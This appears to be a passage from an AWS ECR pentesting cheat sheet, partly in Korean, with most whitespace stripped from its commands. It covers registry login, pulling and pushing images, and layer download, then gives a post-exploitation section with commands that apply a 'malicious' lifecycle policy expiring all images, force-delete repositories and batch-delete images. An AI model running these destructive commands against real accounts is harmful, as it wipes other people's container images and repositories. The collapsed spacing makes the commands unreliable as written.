# Docker login into ecr## For public repo (always use us-east-1)awsecr-publicget-login-password--regionus-east-1|dockerlogin--usernameAWS--password-stdinpublic.ecr.aws/<random-id>## For private repoawsecrget-login-password--profile<profile_name>--region<region>|dockerlogin--usernameAWS--password-stdin<account_id>.dkr.ecr.<region>.amazonaws.com## If you need to acces an image from a repo if a different account, in <account_id> set the account number of the other account# Downloaddockerpull<account_id>.dkr.ecr.<region>.amazonaws.com/<repo_name>:latest## If you still have the error "Requested image not found"## It might be because the tag "latest" doesn't exit## Get valid tags with:TOKEN=$(aws--profile<profile>ecrget-authorization-token--outputtext--query'authorizationData[].authorizationToken')curl-i-H"Authorization: Basic $TOKEN"https://<account_id>.dkr.ecr.<region>.amazonaws.com/v2/<img_name>/tags/list# Inspect the imagedockerinspectsha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0# Upload (example uploading purplepanda with tag latest)dockertagpurplepanda:latest<account_id>.dkr.ecr.<region>.amazonaws.com/purplepanda:latestdockerpush<account_id>.dkr.ecr.<region>.amazonaws.com/purplepanda:latest# Downloading without Docker# List digestsawsecrbatch-get-image--repository-namelevel2 \--registry-id 653711331788 \--image-ids imageTag=latest|jq'.images[].imageManifest | fromjson'## Download a digestawsecrget-download-url-for-layer \--repository-name level2 \--registry-id 653711331788 \--layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a"
이러한 권한을 가진 공격자는 저장소의 모든 이미지를 삭제하는 라이프사이클 정책을 생성하거나 수정할 수 있으며, 그 후 전체 ECR 저장소를 삭제할 수 있습니다. 이로 인해 저장소에 저장된 모든 컨테이너 이미지가 손실됩니다.
bashCopycode#CreateaJSONfilewiththemaliciouslifecyclepolicyecho'{"rules": [{"rulePriority": 1,"description": "Delete all images","selection": {"tagStatus": "any","countType": "imageCountMoreThan","countNumber": 0},"action": {"type": "expire"}}]}'>malicious_policy.json# Apply the malicious lifecycle policy to the ECR repositoryawsecrput-lifecycle-policy--repository-nameyour-ecr-repo-name--lifecycle-policy-textfile://malicious_policy.json# Delete the ECR repositoryawsecrdelete-repository--repository-nameyour-ecr-repo-name--force# Delete the ECR public repositoryawsecr-publicdelete-repository--repository-nameyour-ecr-repo-name--force# Delete multiple images from the ECR repositoryawsecrbatch-delete-image--repository-nameyour-ecr-repo-name--image-idsimageTag=latestimageTag=v1.0.0# Delete multiple images from the ECR public repositoryawsecr-publicbatch-delete-image--repository-nameyour-ecr-repo-name--image-idsimageTag=latestimageTag=v1.0.0